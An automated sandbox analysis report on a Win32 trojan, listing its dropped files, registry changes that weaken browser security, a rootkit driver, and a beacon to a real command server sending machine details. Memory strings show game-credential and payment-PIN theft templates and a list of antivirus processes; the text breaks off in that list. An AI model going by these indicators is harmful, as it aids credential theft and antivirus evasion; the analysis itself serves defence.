HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.46800 (B) (Emsisoft), Gen:Variant.Zusy.46800 (AdAware), GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4f1aed7bbbe43e65cf416fdedb00ecff
SHA1: b9e73c7f73e697932bc7cd2fa2eff0f133da39f9
SHA256: b7ab11bcccb084b0fd3fea86713fe576efe9d8e0e2e36ac266e0491aa48b0b33
SSDeep: 6144:FRkVBq2ypZBpupPAcYrV3eyZuU2i1mB1kCrN:HCBq2GXpuOt3eGrrY1
Size: 228352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-03-15 12:36:24
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:816
%original file name%.exe:320
The Trojan injects its code into the following process(es):
svchost.exe:1152
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ (4 bytes)
%System%\drivers\3a2ba1fa.sys (71 bytes)
%WinDir%\WinSxS (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Coor.bat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\giynhrYsD.dll (90 bytes)
%System%\wshtcpip.dll (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\AppPatch (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B1.zip (19 bytes)
%System%\config\SOFTWARE.LOG (11686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A1.zip (19 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (492 bytes)
C:\$Directory (2360 bytes)
%System%\wshtcptk.dll (19 bytes)
%System% (4664 bytes)
%System%\midimap.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dyeky.dll (90 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C1.zip (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZHHNK1RJ\desktop.ini (67 bytes)
%System%\drivers\4680947c.sys (32 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WHUF81E3\desktop.ini (67 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%System%\config\software (4303 bytes)
%System%\kakutk.dll (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G1U3S5Y7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (16 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (4624 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KQHFGPHV\desktop.ini (67 bytes)
%System%\wbem\Repository\FS\OBJECTS.DATA (10986 bytes)
The Trojan deletes the following file(s):
%System%\drivers\4680947c.sys (0 bytes)
Registry activity
The process regsvr32.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\VersionIndependentProgID]
"(Default)" = "IEHlprObj.IEHlprObj"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\0\win32]
"(Default)" = "%System%\kakutk.dll"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"(Default)" = "{AB705628-B25B-491B-A6BF-4A46FDDBC88E}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0]
"(Default)" = "IEHelper 1.0 Type Library"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\IEHlprObj.IEHlprObj\CurVer]
"(Default)" = "IEHlprObj.IEHlprObj.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\IEHlprObj.IEHlprObj.1]
"(Default)" = "IEHlprObj Class"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IIEHlprObj"
[HKCR\IEHlprObj.IEHlprObj]
"(Default)" = "IEHlprObj Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\IEHlprObj.IEHlprObj.1\CLSID]
"(Default)" = "{AB705622-B25B-491B-A6BF-4A46FDDBC88E}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 98 20 1B 1E E7 D1 34 F6 7E C6 18 68 C2 9A 84"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IEHlprObj Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"(Default)" = "%System%\kakutk.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\ProgID]
"(Default)" = "IEHlprObj.IEHlprObj.1"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\HELPDIR]
"(Default)" = "%System%\"
The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\HOOK_ID]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 20 93 85 03 9A 75 75 8A E3 0B E7 DE DC D1 D5"
[HKCR\CLSID\SYS_DLL]
"Name" = "giynhrYsD.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%System%\jdiguuwBsh, \??\%System%\jdiguuwBsh"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 90affacb3c4f110ba63df2be93f2e41a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\A1.zip |
| 0b14dfd82a538cf8933435397dbc4925 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B1.zip |
| 743cac2a53ba132d086853141246d7d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\C1.zip |
| 5c12660a97822f6e61576943b49aaad6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\H7Ui28hui |
| a581a82cb3267abb7543946ada12bcfa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dyeky.dll |
| 1f08a122535451e44926934069f39d2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\giynhrYsD.dll |
| 883ef2dd3c9f68691ce02daac7267d41 | c:\Program Files\Java\jre6\bin\swe5i |
| fd60844f7dc0cf7c7afa70b7ec6d0a7e | c:\Program Files\Java\jre6\lib\deploy\jqs\ie\7PhfhwYk |
| 565caee4622770caac3aa1213d6738cc | c:\WINDOWS\system32\drivers\3a2ba1fa.sys |
| 4e3d06d6e68eedb52565080f55b460d3 | c:\WINDOWS\system32\jdiguuwBsh |
| 28d9e9a9f8184972ce262a4d9fad6aac | c:\WINDOWS\system32\kakutk.dll |
| 4e3d06d6e68eedb52565080f55b460d3 | c:\WINDOWS\system32\wshtcptk.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\3a2ba1fa.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Propagation
Removals
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 806912 | 1536 | 0 | 033faf6d9fca77f29d3529b55e7abba8 |
| .data | 811008 | 204800 | 201216 | 5.53196 | 4a79f1b149a5041886eaece7dd20e9be |
| .rsrc | 1015808 | 8192 | 6144 | 0.378005 | 0445acc62bc38f6c01f643cc6b44dfe6 |
| .reloc | 1024000 | 4096 | 1536 | 0.065844 | c158ec72e8b1f3d2ed53aff4d702d457 |
| .idata | 1028096 | 20480 | 16896 | 3.2386 | 31347d4c9120a884a1f55d165cb539f2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://198.105.210.188/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | |
| hxxp://educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | |
| hxxp://www.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | 198.105.210.188 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.educaresurvivorship.com
HTTP/1.1 404 Not Found
Date: Tue, 16 Dec 2014 05:40:31 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
4cd..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<title>EduCare Survivorship - Page Not Found</title>.<link href="/styles/styles.css" rel="stylesheet" type="text/css" />.</head>.<body>.<div id="container">..<div id="nav"> </div>..<img id="banner_img" src="/images/educares.jpg" usemap="#banner_img" border="0" width="990" height="416" alt="EduCare, Inc" />..<map id="_banner_img" name="banner_img">...<area shape="rect" coords="792,341,985,411" href="hXXp://VVV.educareinc.com" alt="EduCare, Inc" />..</map>..<div id="subnav">. . ..</div>..<div id="content"> ...<h1>Page Not Found</h1>...<p>We apologize for the inconvenience, but the requested page (VVV.educaresurvivorship.com/get.asp) was not found.</p>. <p><a href="/" title="Return Home">Return Home</a></p>..</div> ..<div id="footer-content"><a href="hXXp://EduCareInc.com" target="_blank">EduCareInc.com</a> ... 8420 ..
<<< skipped >>>
GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Host: 198.105.210.188
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Tue, 16 Dec 2014 05:40:30 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Location: hXXp://VVV.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_1152_rwx_10001000_0003D000:
Lineage Windows Client
Lineage Windows Client
keimigfou@hotmail.com
keimigfou@hotmail.com
%s?up=%s&pp=%s&spp=%s
%s?up=%s&pp=%s&spp=%s
Diablo III.exe
Diablo III.exe
ws2_32.dll
ws2_32.dll
ti.asp?up=%s&pp=%s
ti.asp?up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s&lp=%d
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s&lp=%d
X,
X,
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s
DNF.cfg
DNF.cfg
\res\PCOTP.okf
\res\PCOTP.okf
kernel32.dll
kernel32.dll
dnf.exe
dnf.exe
%sHShield\ehsvc.dll
%sHShield\ehsvc.dll
pcotp.exe
pcotp.exe
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&rp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&rp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s
explorer.exe
explorer.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&lp=%s&spp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&lp=%s&spp=%s
maplestory.exe
maplestory.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&lp=%s&rp=%s&op=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&lp=%s&rp=%s&op=%s
ngm.exe
ngm.exe
baramt.exe
baramt.exe
winbaram.exe
winbaram.exe
ngmdll.dll
ngmdll.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&spp=%s&ssp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&spp=%s&ssp=%s
0xx
0xx
8888888
8888888
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s
client.exe
client.exe
msvcr90.dll
msvcr90.dll
119.205.224.147
119.205.224.147
119.205.224.149
119.205.224.149
119.205.224.150
119.205.224.150
119.205.224.151
119.205.224.151
119.205.224.153
119.205.224.153
119.205.224.159
119.205.224.159
119.205.224.157
119.205.224.157
119.205.224.158
119.205.224.158
119.205.224.160
119.205.224.160
119.205.224.163
119.205.224.163
YGOnline.exe
YGOnline.exe
211.39.155.77
211.39.155.77
211.39.155.78
211.39.155.78
211.39.155.79
211.39.155.79
211.39.155.84
211.39.155.84
211.39.155.81
211.39.155.81
211.39.155.82
211.39.155.82
211.39.155.83
211.39.155.83
211.39.155.80
211.39.155.80
211.39.155.85
211.39.155.85
211.39.155.86
211.39.155.86
211.39.155.95
211.39.155.95
211.39.155.96
211.39.155.96
211.39.155.97
211.39.155.97
211.39.155.98
211.39.155.98
211.39.155.99
211.39.155.99
211.39.155.100
211.39.155.100
211.39.155.101
211.39.155.101
211.39.155.102
211.39.155.102
211.39.155.106
211.39.155.106
211.39.155.107
211.39.155.107
211.39.155.108
211.39.155.108
211.39.155.109
211.39.155.109
211.39.155.110
211.39.155.110
211.39.155.90
211.39.155.90
211.39.155.88
211.39.155.88
211.39.155.89
211.39.155.89
cabal2main.exe
cabal2main.exe
gameguard.des
gameguard.des
%s-%s-%s-%s
%s-%s-%s-%s
%s-%s-%s-%s-%s
%s-%s-%s-%s-%s
%s-%s-%s
%s-%s-%s
ie ....Hwnd::::::::%x
ie ....Hwnd::::::::%x
Hwnd::::::::%x,class:%s
Hwnd::::::::%x,class:%s
OLEACC.DLL
OLEACC.DLL
1111111%s:%s
1111111%s:%s
gtc_pay_info%d
gtc_pay_info%d
btc_pay_passwd
btc_pay_passwd
btc_pay_info%d
btc_pay_info%d
FunnyCard$txtFunnyCardNo%d
FunnyCard$txtFunnyCardNo%d
ftc_pay_info%d
ftc_pay_info%d
Pyunweijum$txtPin%d
Pyunweijum$txtPin%d
ptc_pay_info%d
ptc_pay_info%d
TeenCash$txtPin%d
TeenCash$txtPin%d
tc_pay_info%d
tc_pay_info%d
ctl00$ContentPlaceHolder1$PayInfoControl$GAMEGIFTControl$txt_gamegift_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$GAMEGIFTControl$txt_gamegift_pin%d
GameCulture$txtPinNumber_%d
GameCulture$txtPinNumber_%d
ctl00$ContentPlaceHolder1$PayInfoControl$GTCARDControl$txt_gtcard_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$GTCARDControl$txt_gtcard_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$BOOKLIFEControl$txt_booklife_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$BOOKLIFEControl$txt_booklife_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$TEENCASHControl$txt_teencash_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$TEENCASHControl$txt_teencash_pin%d
fifazf.exe
fifazf.exe
raycity.exe
raycity.exe
launchern.exe
launchern.exe
ModuMarble.exe
ModuMarble.exe
cstrike-online.exe
cstrike-online.exe
suddenattack.exe
suddenattack.exe
KartRider.exe
KartRider.exe
%s?ap=%s&up=%s&pp=%s&ssp=%s
%s?ap=%s&up=%s&pp=%s&ssp=%s
sdkjfwuieui78238iueufhueir26537848923weuhifhuwhfuiweyuYUYFDHHJHJHJYTYRTRUDHHJHJDHJAJDJHiuwruy7823828305uweuiryufweyuqr7823yuweuyruifwehfdhudsygfksjadkjlssladgluoiweweqtyuiwer7878weyfuhdsdsafhbyguwqr727283qwyuweuiyryuiyuGFREERTYGYHBHAHBDBGXBGATFDHUAUDHYTDYHADHJYUDYGAHDJHADHJHJDHJAHJDHJ65218489u832rhuewhufuywebhfdssbabufhwewhueryfy8qrq7ryhdshbfcbnashufyguwetwyqtryuqwrhhbsabjfhjsafgwekfwepqweiuwquiosifpwqetoweuiqr892389r89weuifjkweur823789ruweuiufuiweqtouiwqtuiowetuijhdshfgyasgfhbhfweyuryuwehuerhgnsdgUUIYUTYHBHDUWYHDHYTDTTRWYETYYUADHBDBABDIAIHJKJFJKKJFLLUIYURYUWTOIPQHHHGXVVCXCAHJDGDWUUYDYHSDHisdhuafuiweyuqr67782378r89wer7uhusehfuwyueehfh2eywq67478yhfrhhsduafh8yweqr7wehufiuweuiruifwq787qwyhuwefyuweyrfrtqw7e8ry78wehuhusdahfhuwyueqeryupwiqeshdfbdsnaxvnmhajdshjdfygwqethufisdshjfuiasyhufweyutyqweuiweqtuiweytyuieryuHGHGHDFTRREYUHGFYGHJHKHUTYTYUUYYUHYHGFGUYIUITYERWEDVGHFBGBVFSDGVBHJGHGFTRFHJKJJHGFFGYHJhjsdyufygusadftyufsayufyuqwer78236tr7sgtsafhjasygftg7t6q2rygudsaygfyuweyurfqtyuwfggwqrtt2678398712307r53267ryesdgufsady
sdkjfwuieui78238iueufhueir26537848923weuhifhuwhfuiweyuYUYFDHHJHJHJYTYRTRUDHHJHJDHJAJDJHiuwruy7823828305uweuiryufweyuqr7823yuweuyruifwehfdhudsygfksjadkjlssladgluoiweweqtyuiwer7878weyfuhdsdsafhbyguwqr727283qwyuweuiyryuiyuGFREERTYGYHBHAHBDBGXBGATFDHUAUDHYTDYHADHJYUDYGAHDJHADHJHJDHJAHJDHJ65218489u832rhuewhufuywebhfdssbabufhwewhueryfy8qrq7ryhdshbfcbnashufyguwetwyqtryuqwrhhbsabjfhjsafgwekfwepqweiuwquiosifpwqetoweuiqr892389r89weuifjkweur823789ruweuiufuiweqtouiwqtuiowetuijhdshfgyasgfhbhfweyuryuwehuerhgnsdgUUIYUTYHBHDUWYHDHYTDTTRWYETYYUADHBDBABDIAIHJKJFJKKJFLLUIYURYUWTOIPQHHHGXVVCXCAHJDGDWUUYDYHSDHisdhuafuiweyuqr67782378r89wer7uhusehfuwyueehfh2eywq67478yhfrhhsduafh8yweqr7wehufiuweuiruifwq787qwyhuwefyuweyrfrtqw7e8ry78wehuhusdahfhuwyueqeryupwiqeshdfbdsnaxvnmhajdshjdfygwqethufisdshjfuiasyhufweyutyqweuiweqtuiweytyuieryuHGHGHDFTRREYUHGFYGHJHKHUTYTYUUYYUHYHGFGUYIUITYERWEDVGHFBGBVFSDGVBHJGHGFTRFHJKJJHGFFGYHJhjsdyufygusadftyufsayufyuqwer78236tr7sgtsafhjasygftg7t6q2rygudsaygfyuweyurfqtyuwfggwqrtt2678398712307r53267ryesdgufsady
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
sos.exe
sos.exe
ykm.exe
ykm.exe
~!@#$%^&*
~!@#$%^&*
heroes.exe
heroes.exe
MYSFTY.EXE
MYSFTY.EXE
CHROME.EXE
CHROME.EXE
FIREFOX.EXE
FIREFOX.EXE
NVCAGENT.NPC
NVCAGENT.NPC
NSVMON.NPC
NSVMON.NPC
NSAVSVC.NPC
NSAVSVC.NPC
V3SP.EXE
V3SP.EXE
V3SVC.EXE
V3SVC.EXE
V3UP.EXE
V3UP.EXE
V3LSVC.EXE
V3LSVC.EXE
V3LRUN.EXE
V3LRUN.EXE
V3LTRAY.EXE
V3LTRAY.EXE
MUPDATE2.EXE
MUPDATE2.EXE
SGSVC.EXE
SGSVC.EXE
SGUI.EXE
SGUI.EXE
SGRUN.EXE
SGRUN.EXE
NAVERAGENT.EXE
NAVERAGENT.EXE
AVP.EXE
AVP.EXE
AYRTSRV.AYE
AYRTSRV.AYE
AYUPDSRV.AYE
AYUPDSRV.AYE
AYAGENT.AYE
AYAGENT.AYE
AVGNT.EXE
AVGNT.EXE
AVCENTER.EXE
AVCENTER.EXE
AVGUARD.EXE
AVGUARD.EXE
AVSCAN.EXE
AVSCAN.EXE
AVUPGSVC.EXE
AVUPGSVC.EXE
AVWSC.EXE
AVWSC.EXE
AVASTSVC.EXE
AVASTSVC.EXE
ASHUPD.EXE
ASHUPD.EXE
AVASTUI.EXE
AVASTUI.EXE
SHSTAT.EXE
SHSTAT.EXE
MCTRAY.EXE
MCTRAY.EXE
UDATERUI.EXE
UDATERUI.EXE
MSSECES.EXE
MSSECES.EXE
EGUI.EXE
EGUI.EXE
EKRN.EXE
EKRN.EXE
CCSVCHST.EXE
CCSVCHST.EXE
NAVW32.EXE
NAVW32.EXE
UPDATESRV.EXE
UPDATESRV.EXE
VSSERV.EXE
VSSERV.EXE
SECCENTER.EXE
SECCENTER.EXE
BDAGENT.EXE
BDAGENT.EXE
BDREINIT.EXE
BDREINIT.EXE
AVGAM.EXE
AVGAM.EXE
AVGEMC.EXE
AVGEMC.EXE
AVGNSX.EXE
AVGNSX.EXE
AVGRSX.EXE
AVGRSX.EXE
AVGFRW.EXE
AVGFRW.EXE
AVGWDSVC.EXE
AVGWDSVC.EXE
AVGUPD.EXE
AVGUPD.EXE
bsier2.dat
bsier2.dat
bsiezq.dat
bsiezq.dat
bsiejh.dat
bsiejh.dat
bsiepk.dat
bsiepk.dat
bsielq.dat
bsielq.dat
bsgdsos.dat
bsgdsos.dat
bsiegd.dat
bsiegd.dat
bsiemxd.dat
bsiemxd.dat
bsiedk.dat
